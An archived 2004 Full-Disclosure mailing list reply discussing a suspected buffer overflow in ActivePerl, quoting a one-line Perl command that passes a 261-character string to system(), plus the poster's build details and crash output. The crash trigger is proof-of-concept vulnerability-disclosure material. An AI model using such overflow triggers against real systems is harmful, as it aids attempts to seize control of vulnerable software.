lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Date: Tue, 18 May 2004 10:15:48 -0700 From: "morning_wood" <se_cur_ity@...mail.com> To: <nick@...us-l.demon.co.uk>, <bugtraq@...urityfocus.com>, <full-disclosure@...ts.netsys.com> Subject: Re: Re: Buffer Overflow in ActivePerl ? >and we seem to get control of EIP. Coincidence? Try yet two more: >C:\>perl -e "$a="A" x 261; system($a)" C:\>perl -V Characteristics of this binary (from libperl): Compile-time options: MULTIPLICITY USE_ITHREADS PERL_IMPLICIT_ LICIT_SYS Locally applied patches: ActivePerl Build 635 Built under MSWin32 Compiled at Feb 4 2003 15:34:21 @INC: C:/Perl/lib C:/Perl/site/lib . C:\> C:\>perl -e "$a="A" x 261; system($a)" The input line is too long. [CRASHE HERE] C:\> _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Powered by blists - more mailing lists